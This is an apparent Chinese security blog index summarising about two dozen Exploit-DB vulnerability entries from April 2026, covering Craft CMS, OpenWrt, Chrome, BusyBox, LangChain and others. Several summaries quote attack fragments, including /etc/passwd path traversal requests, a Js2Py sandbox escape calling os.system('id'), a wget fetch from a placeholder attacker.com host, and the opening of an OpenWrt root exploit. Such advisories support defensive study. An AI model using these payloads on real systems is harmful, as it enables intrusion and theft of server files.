漏洞分析

A collection of 811 posts
漏洞分析

[webapps] Craft CMS 5.6.16 - RCE

CVE-2025-32432 Craft CMS 5.6.16 存在远程代码执行漏洞 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-32432漏洞类型远程代码执行受影响版本Craft CMS 5.6.16危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 严格基于原文内容,未提供具体函数/参数/设计缺陷信息,无法确定根本原因。 🎯 攻击场景 严格基于原文内容,未提供攻击步骤,无法描述。 💥 漏洞影响 严格基于原文内容,标题明确为RCE,可导致远程代码执行。 ⚔️ Nuclei Exploit 模板 以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证: id: CVE-2025-32432-exploit info: name: Craft
阅读时间 2 分钟
漏洞分析

[local] GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation

CVE-2026-24061 GNU InetUtils 2.6 telnetd服务器存在远程权限提升漏洞,允许低权限用户提权至root。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-24061漏洞类型权限提升受影响版本GNU InetUtils 2.6 (telnetd组件)危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Ali Guliyev (infat0x)来源Exploit-DB 原文 ↗ 🔬 漏洞根因 telnetd守护进程在处理用户输入时存在边界条件缺陷,允许伪造的认证消息触发特权操作,未正确验证用户权限即执行高权限命令。 🎯 攻击场景 1. 攻击者通过telnet连接目标服务器。 2. 发送特制的认证报文,触发telnetd中的逻辑漏洞。 3. 成功绕过身份验证,以root权限执行任意命令。 4. 获得完全控制权。前置条件:目标运行GNU InetUtils 2.6且telnetd服务开启。 💥 漏洞影响 未经身份验证的远程攻击者可通过t
阅读时间 4 分钟
漏洞分析

[webapps] GeographicLib v2.5.1 - stack buffer overflow

CVE-2025-60751 GeographicLib v2.5.1 因对输入数据长度未做充分验证,导致栈缓冲区溢出。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-60751漏洞类型栈缓冲区溢出受影响版本GeographicLib v2.5.1危害等级Critical · CVSS 9.8发布日期2026-04-29来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在 GeographicLib::NormalGravity::WGS84 函数中,处理特定格式的经纬度输入时,未正确校验输入数据长度即复制到固定大小的栈缓冲区,导致缓冲区溢出。 🎯 攻击场景 1. 攻击者构造超长字符串作为经纬度参数;2. 向受影响的 GeographicLib 服务发送包含该参数的请求;3. 服务解析输入并调用 NormalGravity::WGS84 函数;4. 函数将超长字符串复制到栈缓冲区,发生溢出,覆盖栈上返回地址或关键数据;5. 精心构造的溢出 payload 可劫持控制流,执行任意代码。
阅读时间 2 分钟
漏洞分析

[local] OpenWrt 23.05 - Authenticated Remote Code Execution (RCE)

未分配CVE 漏洞 High · CVSS N/A 📋 漏洞基础信息 CVE未分配CVE漏洞类型漏洞受影响版本详见原文危害等级High · CVSS N/A发布日期2026-04-29提交者Ahmet Mersin来源Exploit-DB 原文 ↗ ⚔️ 原始 PoC # Exploit Author: Ahmet Mersin """ OpenWrt luci-app-https-dns-proxy Root Takeover Exploit CVE-202X-XXXXX - Local Privilege Escalation via Command Injection import requests import sys import getpass def banner(): print(""" ╔═══════════════════════════════════════════════════════════════╗ ║ OpenWrt https-dns-proxy Root
阅读时间 3 分钟
漏洞分析

[webapps] OpenKM 6.3.12 - Multiple

未分配CVE OpenKM 6.3.12 存在多个安全漏洞,包括未授权访问和远程代码执行。 Critical · CVSS 9.8 📋 漏洞基础信息 CVE未分配CVE漏洞类型未授权访问 / 远程代码执行受影响版本OpenKM 6.3.12危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Terra System Labs Pvt. Ltd.来源Exploit-DB 原文 ↗ 🔬 漏洞根因 漏洞存在于文件上传与导出功能中,未对用户权限进行充分校验,导致低权限用户可上传恶意文件或直接访问管理功能;同时,未对上传文件类型进行严格过滤,允许上传 JSP 等可执行文件。 🎯 攻击场景 1. 攻击者未登录或使用低权限账户访问 OpenKM 系统。2. 利用未授权端点直接上传恶意 JSP 文件到 web 可访问目录。3. 通过浏览器访问上传的 JSP 文件,
阅读时间 8 分钟
漏洞分析

[webapps] Xibo CMS 4.3.0 - RCE via SSTI

CVE-2025-62639CVE-2025-62369 Xibo CMS 4.3.0 因 SSTI 导致远程代码执行 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-62639CVE-2025-62369漏洞类型服务器端模板注入RCE受影响版本Xibo CMS 4.3.0危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Cristian Branet来源Exploit-DB 原文 ↗ 🔬 漏洞根因 Xibo CMS 在渲染通知内容时,未对用户可控的模板输入进行安全过滤,允许攻击者在模板中注入 Twig/Smarty 表达式,最终导致代码执行 🎯 攻击场景 1. 攻击者需具备管理员或通知创建权限。2. 在创建通知时,将恶意 SSTI Payload 填入通知内容字段。3. 当系统渲染通知时,Payload 被执行,触发远程代码执行。成功标志为在服务器上执行任意命令(如反弹
阅读时间 4 分钟
漏洞分析

[webapps] LangChain Core 1.2.4 - SSTI/RCE

CVE-2025-68664 LangChain Core 1.2.4存在SSTI漏洞,可导致远程代码执行。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-68664漏洞类型服务端模板注入(SSTI)受影响版本LangChain Core 1.2.4危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 LangChain Core在处理模板渲染时,未对用户可控的输入进行充分过滤或转义,导致攻击者能够注入并执行模板引擎的恶意代码。 🎯 攻击场景 1. 攻击者识别出使用LangChain Core 1.2.4的应用中,存在将用户输入直接传递至`PromptTemplate`或`ChatPromptTemplate`等组件进行模板渲染的端点;2. 构造包含SSTI载荷的恶意字符串(例如`{{config}}`、`{{''.__class__.__mro_
阅读时间 2 分钟
漏洞分析

[webapps] FUXA 1.2.8 - Authentication Bypass + RCE Exploit

CVE-2025-69985 FUXA 1.2.8 存在身份认证绕过漏洞,导致未经授权的攻击者可执行远程代码。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-69985漏洞类型身份认证绕过 + 远程代码执行受影响版本FUXA <= 1.2.8危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Joshua van der Poll (https://github.com/joshuavanderpoll/)来源Exploit-DB 原文 ↗ 🔬 漏洞根因 FUXA WebSocket 服务未对会话进行有效认证。攻击者可通过伪造 WebSocket 请求绕过登录,并利用内置的 `system` 命令执行接口实现 RCE。 🎯 攻击场景 1. 攻击者直接向 FUXA 的 WebSocket 端口发送伪造的认证握手包。2. 成功绕过身份验证后,
阅读时间 3 分钟
漏洞分析

[local] Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap

CVE-2026-2441 Google Chrome CSSFontFeatureValuesMap 在迭代过程中允许并发修改引发释放后使用。 High · CVSS 8.8 📋 漏洞基础信息 CVECVE-2026-2441漏洞类型Use-After-Free (UAF)受影响版本Google Chrome 145.0.7632.75危害等级High · CVSS 8.8发布日期2026-04-30提交者nu11secur1ty来源Exploit-DB 原文 ↗ 🔬 漏洞根因 CSSFontFeatureValuesMap 对象在迭代器活动期间允许通过 delete() 和 set() 修改内部映射,导致内存被释放后仍被迭代器引用。 🎯 攻击场景 1. 定义 @font-feature-values 规则并获取 styleset 映射;2. 创建该映射的迭代器(map.entries());3. 在迭代过程中对同一映射执行 delete(key) 并插入大量条目(512次)强制触发哈希表 rehash;4.
阅读时间 15 分钟
漏洞分析

[webapps] Repetier-Server 1.4.10 - Path Traversal

CVE-2026-26335 Repetier-Server 1.4.10 存在路径遍历漏洞,可读取任意文件。 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2026-26335漏洞类型路径遍历受影响版本Repetier-Server 1.4.10危害等级High · CVSS 7.5发布日期2026-04-30提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 文件请求处理中未对路径参数进行有效过滤,导致攻击者可通过../序列访问受限目录外的文件。 🎯 攻击场景 1. 攻击者确认目标运行Repetier-Server 1.4.10; 2. 构造包含../的URL,如http://target/printer/../../etc/passwd; 3. 发送请求; 4. 服务器返回/etc/passwd文件内容。 💥 漏洞影响 攻击者可读取服务器上的任意文件,导致敏感信息泄露(如配置文件、
阅读时间 3 分钟
漏洞分析

[webapps] HUSTOJ Zip-Slip v26.01.24 - RCE

CVE-2026-24479 HUSTOJ 因未校验ZIP解压路径导致路径遍历,可写入文件实现RCE。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-24479漏洞类型路径遍历RCE (Zip-Slip)受影响版本HUSTOJ v26.01.24危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Marshall Whittaker / oxagast来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在文件解压功能中,未过滤ZIP条目中的相对路径(如../),文件写入时路径拼接导致可写入任意目录。 🎯 攻击场景 1. 攻击者构造恶意ZIP文件,内含带有../前缀的文件条目; 2. 通过HUSTOJ的上传/导入功能提交该ZIP; 3. 系统解压时将文件写入到Web目录外的可执行路径(如cgi-bin或PHP目录); 4. 攻击者访问写入的文件触发执行,获得远程代码执行权限。 💥 漏洞影响 攻击者可远程执行任意代码,完全控制服务器,导致数据泄露、文件篡改、服务中断
阅读时间 7 分钟
漏洞分析

[webapps] BusyBox 1.37.0 - Path Traversal

CVE-2026-26157 BusyBox wget 组件未对输入路径进行安全检查,导致文件被写入任意目录。 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2026-26157漏洞类型路径遍历受影响版本BusyBox 1.37.0危害等级High · CVSS 7.5发布日期2026-04-30提交者Calil Khalil来源Exploit-DB 原文 ↗ 🔬 漏洞根因 BusyBox 自带的 wget 工具在处理下载文件的保存路径时,未对服务器返回的 Content-Disposition 头中的 filename 字段进行路径过滤,导致攻击者可通过构造包含 ../ 序列的文件名,将下载内容写入绝对路径下的任意位置。 🎯 攻击场景 1. 攻击者在可控服务器上放置恶意文件,并配置响应头 Content-Disposition: attachment; filename=../../tmp/evil.sh。2. 受害者在 BusyBox 环境中执行 wget http://attacker.com/
阅读时间 4 分钟
漏洞分析

[local] Windows 11 25H2 - Heap Overflow

CVE-2026-21248CVE-2026-21244 Windows 11 25H2 本地堆溢出漏洞,通过畸形文件触发,导致权限提升或拒绝服务。 High · CVSS 7.8 📋 漏洞基础信息 CVECVE-2026-21248CVE-2026-21244漏洞类型堆溢出受影响版本Windows 11 version 25H2 (尚未公开发布,仅限内部测试版本)危害等级High · CVSS 7.8发布日期2026-04-30提交者nu11secur1ty来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在 Windows 11 25H2 的某个系统组件处理用户提供的畸形输入时,未充分校验数据长度,导致堆缓冲区写入超出边界。 🎯 攻击场景 1. 攻击者构造特制的畸形文件或输入。 2. 本地用户(或通过社工诱使用户)打开该文件。 3. 系统组件在解析时发生堆溢出,覆盖关键数据结构。 4. 攻击者可利用此漏洞提升权限至 SYSTEM 或造成系统崩溃。 💥 漏洞影响 攻击者本地执行代码,实现权限提升(EoP)或导致拒绝服务(
阅读时间 15 分钟
漏洞分析

[webapps] JUNG Smart Visu Server 1.1.1050 - Dos

CVE-2026-26235 JUNG Smart Visu Server 1.1.1050存在未授权访问导致拒绝服务漏洞。 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2026-26235漏洞类型拒绝服务(DoS)受影响版本JUNG Smart Visu Server 1.1.1050危害等级High · CVSS 7.5发布日期2026-04-30提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 该漏洞源于对特定HTTP请求的处理不当,攻击者无需认证即可发送构造的数据包,导致服务器资源耗尽或进程崩溃。 🎯 攻击场景 1. 攻击者定位目标JUNG Smart Visu Server 1.1.1050的IP地址和端口(默认80)。 2. 发送精心构造的HTTP请求(如大量连接、畸形报文或触发死循环)。 3. 服务器CPU和内存占用激增,响应超时或无响应。 4.
阅读时间 11 分钟
漏洞分析

[webapps] SumatraPDF 3.5.2 - Remote Code Execution

CVE-2026-25961 SumatraPDF 3.5.2 存在远程代码执行漏洞,通过打开恶意PDF文件可执行任意命令。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-25961漏洞类型路径遍历RCE受影响版本SumatraPDF 3.5.2危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Mohammed I. Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 漏洞源于 SumatraPDF 在处理 PDF 文件的 /Catalog/AcroForm 结构时,未充分验证文件路径,导致可构造包含恶意命令的 PDF 文件,利用路径遍历触发执行。 🎯 攻击场景 1. 攻击者构造包含恶意 JavaScript 或 /AA(附加动作)的 PDF 文件; 2. 诱骗受害者使用 SumatraPDF 3.
阅读时间 4 分钟
漏洞分析

[webapps] NiceGUI 3.6.1 - Path Traversal

CVE-2026-25732 NiceGUI 3.6.1 中因静态文件路径处理不当导致目录遍历漏洞 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2026-25732漏洞类型路径遍历受影响版本NiceGUI 3.6.1危害等级High · CVSS 7.5发布日期2026-04-30提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在静态文件服务中未对用户提供的路径进行规范化校验,导致可 escape 出 web 根目录访问任意文件。 🎯 攻击场景 攻击者发送形如 /static/../../../etc/passwd 的HTTP请求,利用路径穿越读取服务器本地敏感文件,前置条件为服务端口可被访问,成功标志为读取到目标文件内容。 💥 漏洞影响 攻击者可读取服务器上任意文件,包括配置文件、密钥、数据库凭证等敏感信息,可能导致进一步权限提升或内网渗透。 ⚔️ Nuclei Exploit 模板 以下为标准 Nuclei v3 格式的利用模板,
阅读时间 2 分钟
漏洞分析

[webapps] Frigate NVR 0.16.3 - Remote Code Execution

CVE-2026-25643 Frigate NVR 0.16.3 认证后通过 API 路径遍历导致远程代码执行。 Critical · CVSS 9.1 📋 漏洞基础信息 CVECVE-2026-25643漏洞类型路径遍历 + 远程代码执行受影响版本Frigate NVR 0.16.3危害等级Critical · CVSS 9.1发布日期2026-04-30提交者jduardo2704来源Exploit-DB 原文 ↗ 🔬 漏洞根因 API 端点 /api/upload/pipeline 在 processing_pipeline_dir 函数中未充分过滤用户提供的文件名,允许通过 ../ 序列实现目录遍历,进而将恶意文件写入特定目录并由系统自动执行。 🎯 攻击场景 1. 攻击者通过前端或 API 认证登录 Frigate 系统。2. 构造包含路径遍历序列(例如 ../../../path/to/
阅读时间 3 分钟
漏洞分析

[webapps] Js2Py 0.74 - RCE

CVE-2024-28397 Js2Py 0.74版本在代码生成中存在沙箱逃逸,导致任意Python代码执行。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2024-28397漏洞类型沙箱逃逸RCE受影响版本Js2Py 0.74危害等级Critical · CVSS 9.8发布日期2026-04-30来源Exploit-DB 原文 ↗ 🔬 漏洞根因 Js2Py在将JavaScript代码转换为Python代码时,未能对`__import__`、`eval`、`exec`等危险函数名进行有效过滤,导致攻击者可通过构造特殊的JavaScript代码(如`eval.__proto__`)在生成的Python代码中执行任意Python语句。 🎯 攻击场景 1. 攻击者准备一段包含恶意JavaScript的代码,例如`eval.__proto__.__proto__.__proto__['__import__']('os').system('id')`。 2. 攻击者将此代码作为输入传递给Js2Py库的转换函数(
阅读时间 3 分钟
漏洞分析

[webapps] Camaleon CMS v2.9.0 - Path Traversal

CVE-2024-46987 Camaleon CMS v2.9.0 存在路径遍历漏洞,攻击者可读取任意文件。 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2024-46987漏洞类型路径遍历受影响版本Camaleon CMS v2.9.0危害等级High · CVSS 7.5发布日期2026-04-30提交者Sakshi Velampudi (CyberQuestor)来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在`app/controllers/camaleon_cms/media_controller.rb`中,文件下载功能未对用户输入的`file_path`参数进行充分验证,允许包含`../`等路径穿越序列,导致可读取服务器上的任意文件。 🎯 攻击场景 1. 前置条件:需要已登录的有效用户会话。 2. 攻击者构造包含路径遍历序列的请求,例如:`GET
阅读时间 3 分钟
漏洞分析

[webapps] Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection

CVE-2026-25130 Cybersecurity AI (CAI) Framework 0.5.10 存在命令注入漏洞,允许攻击者通过特制请求执行任意系统命令。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-25130漏洞类型命令注入受影响版本Cybersecurity AI (CAI) Framework 0.5.10危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 Cybersecurity AI (CAI) Framework 0.5.10 在处理用户输入时未进行充分的过滤或转义,将用户可控的数据直接传递给系统命令执行函数,导致命令注入。 🎯 攻击场景 1. 攻击者识别到 CAI Framework 的一个功能点,该功能接受用户输入并用于执行系统命令。 2. 攻击者构造包含恶意命令的输入,例如使用分号、管道符、
阅读时间 3 分钟
漏洞分析

[webapps] Erugo 0.2.14 - Remote Code Execution (RCE)

CVE-2026-24897 Erugo 0.2.14版本中存在远程代码执行漏洞,攻击者可利用文件上传功能执行任意Python代码。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-24897漏洞类型文件上传导致的远程代码执行受影响版本Erugo <= 0.2.14危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Abdul Moiz来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在文件上传功能中,服务器未对上传文件的扩展名和内容进行有效校验,导致用户可上传包含恶意Python代码的.py文件,并通过直接访问上传路径触发执行。具体涉及/uploads/目录的文件存储和静态文件服务的配置缺陷。 🎯 攻击场景 1. 攻击者构造一个包含恶意Python代码的.py文件(例如执行系统命令)。 2. 通过Erugo的文件上传功能上传该文件到服务器。 3. 服务器将文件保存至可被公开访问的/uploads/目录下。 4. 攻击者直接通过HTTP GET请求访问上传的.py文件。
阅读时间 4 分钟
漏洞分析

[webapps] deephas 1.0.7 - Prototype Pollution

CVE-2026-25047 deephas 1.0.7 存在原型污染漏洞,允许攻击者通过精心构造的输入污染对象原型。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-25047漏洞类型原型污染受影响版本deephas 1.0.7危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 应用在处理用户输入时未正确限制属性设置操作,允许通过 `__proto__` 或 `constructor.prototype` 等特殊路径修改 Object.prototype 的属性,导致全局对象原型被污染。 🎯 攻击场景 1. 攻击者发送一个包含 `__proto__` 或 `constructor.prototype` 键的 HTTP 请求(例如 JSON 体或查询参数)。 2. 服务器端代码在处理该输入时(如深度合并、
阅读时间 4 分钟
漏洞分析

[local] Windows 11 23H2 - Denial of Service (DoS)

CVE-2025-47987 Windows 11 23H2 本地拒绝服务漏洞,通过创建特殊文件或触发系统错误导致蓝屏。 Medium · CVSS 5.5 (估计) 📋 漏洞基础信息 CVECVE-2025-47987漏洞类型本地拒绝服务 (DoS)受影响版本Windows 11 23H2 (所有版本)危害等级Medium · CVSS 5.5 (估计)发布日期2026-04-30提交者Kryptoenix来源Exploit-DB 原文 ↗ 🔬 漏洞根因 原文未指明具体函数,但属于系统内核或关键驱动在处理特定用户输入(如畸形文件或系统调用参数)时未正确验证边界条件,导致资源耗尽或访问违规引发崩溃。 🎯 攻击场景 1. 攻击者需要本地访问权限(如普通用户)。2. 执行特制程序或触发系统操作(如读取畸形文件)。3. 系统立即蓝屏或停止响应。成功标志为系统重启或完全不可用。 💥 漏洞影响 本地拒绝服务(DoS),导致系统蓝屏或完全死机,攻击者只能造成系统不可用,无数据窃取或远程利用能力。 ⚔️ PoC / Exploit
阅读时间 15 分钟
[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)